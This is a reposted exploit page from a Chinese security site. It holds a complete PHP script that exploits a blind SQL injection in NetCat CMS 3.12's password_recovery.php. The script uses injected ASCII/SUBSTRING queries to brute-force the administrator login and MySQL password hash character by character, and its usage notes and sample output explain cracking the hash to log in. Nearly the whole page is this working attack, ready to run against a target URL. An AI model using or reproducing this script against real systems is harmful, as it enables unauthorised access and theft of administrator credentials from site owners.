首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CMS NetCat 3.12 (password_recovery.php) Blind SQL Injection Exploit
来源:s4avrd0w@p0c.ru 作者:s4avrd0w 发布时间:2008-12-24  

<?

/*
 NetCat Blind SQL Injection exploit by s4avrd0w [s4avrd0w@p0c.ru]
 Versions affected 3.12

 More info: http://www.netcat.ru/

 * tested on version 3.12

 usage:

 # ./NetCat_blind_SQL_exploit.php -s=NetCat_server -u=User_ID

 The options are required:
  -u The user identifier (number in table)
  -s Target for exploiting

 example:

 # ./NetCat_blind_SQL_exploit.php -s=http://localhost/netcat/ -u=2

 [+] Phase 1 brute login.
 [+] Brute 1 symbol...
 ...........a
 [+] Brute 2 symbol...
 ..............d
 [+] Brute 3 symbol...
 .......................m
 [+] Brute 4 symbol...
 ...................i
 [+] Brute 5 symbol...
 ........................n
 [+] Brute 6 symbol...
 .....................................
 [+] Phase 1 successfully finished: admin
 [+] Phase 2 brute password-hash.
 [+] Brute 1 symbol...
 *
 [+] Brute 2 symbol...
 .0
 [+] Brute 3 symbol...
 .0
 [+] Brute N symbol...
 
 <...>
 
 [+] Brute 42 symbol...
 .....................................
 [+] Phase 2 successfully finished: *00a51f3f48415c7d4e8908980d443c29c69b60c9
 
 
 [+] Exploiting is finished successfully
 [+] Login - admin
 [+] MySQL hash - *00a51f3f48415c7d4e8908980d443c29c69b60c9
 [+] Decrypt MySQL hash and login into NetCat CMS.

*/


function http_connect($query)
{

 global $server;

 $headers = array(
     'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
     'Referer' => $server
 );

 $res_http = new HttpRequest($server."modules/auth/password_recovery.php?=1".$query, HttpRequest::METH_GET);
 $res_http->addHeaders($headers);

 try {
  $response = $res_http->send()->getBody();

  if (eregi("page_header", $response))
  {
   return 1;
  }
  else
  {
   return 0;
  }

 } catch (HttpException $exception) {

  print "[-] Not connected";
  exit(0);

 }

}

function brute($User_id,$table)
{
 $ret_str = "";

 for ($i=1;$i<43;$i++)
 {
  print "[+] Brute $i symbol...\n";

  for ($j=42;$j<123;$j++)
  {
   $q = "'/**/OR/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/$table/**/FROM/**/USER/**/limit/**/$User_id,1),$i,1))))=$j,1,0)/*";

   if (http_connect($q))
   {
    $ret_str=$ret_str.chr($j);
    print chr($j)."\n";
    break;
   }
   print ".";

   if ($j == 57) $j = 96;
   if ($j == 42) $j = 47;

  }

  if ($j == 123) break;
 }

 return $ret_str;
}


function help_argc($script_name)
{
print "
usage:

# ./".$script_name." -s=NetCat_server -u=User_ID

The options are required:
 -u The user identifier (number in table)
 -s Target for exploiting

example:

# ./".$script_name." -s=http://localhost/netcat/ -u=1
[+] Phase 1 brute login.
[+] Brute 1 symbol...
..1
[+] Brute 2 symbol...
.....................................
[+] Phase 1 successfully finished: 1
[+] Phase 2 brute password-hash.
[+] Brute 1 symbol...
.....................................
[+] Phase 2 successfully finished:


[+] Exploiting is finished successfully
[+] Login - 1
[+] MySQL hash -
[+] You can login into NetCat CMS with the empty password
";
}

function successfully($login,$hash)
{
print "

[+] Exploiting is finished successfully
[+] Login - $login
[+] MySQL hash - $hash
";

if ($hash) print "[+] Decrypt MySQL hash and login into NetCat CMS.\n";
else print "[+] You can login into NetCat CMS with the empty password\n";

}

if (($argc != 3) || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
 help_argc($argv[0]);
 exit(0);
}
else
{
 $ARG = array();
 foreach ($argv as $arg) {
  if (strpos($arg, '-') === 0) {
   $key = substr($arg,1,1);
   if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg));
  }
 }

 if ($ARG[s] && $ARG[u])
 {
  $server = $ARG[s];
  $User_id = intval($ARG[u]);
  $User_id--;

  print "[+] Phase 1 brute login.\n";
  $login = brute($User_id,"Login");
  print "\n[+] Phase 1 successfully finished: $login\n";

  print "[+] Phase 2 brute password-hash.\n";
  $hash = brute($User_id,"Password");
  print "\n[+] Phase 2 successfully finished: $hash\n";

  successfully($login,$hash);
 }
 else
 {
  help_argc($argv[0]);
  exit(0);
 }

}

?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PGP Desktop 9.0.6 (PGPwded.sys
·RoundCube Webmail <= 0.2b Remo
·Psi Jabber Client (8010/tcp) R
·CMS NetCat 3.12 (password_reco
·Mozilla Firefox 3.0.5 location
·Getleft 1.2 Remote Buffer Over
·CUPS < 1.3.8-4 (pstopdf filter
·Google Chrome Browser (ChromeH
·FreeSSHD 1.2.1 (Post Auth) Rem
·Exploits FreeSSHd Multiple Rem
·SolarCMS 0.53.8 (Forum) Remote
·CoolPlayer 2.19 (Skin File) Lo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved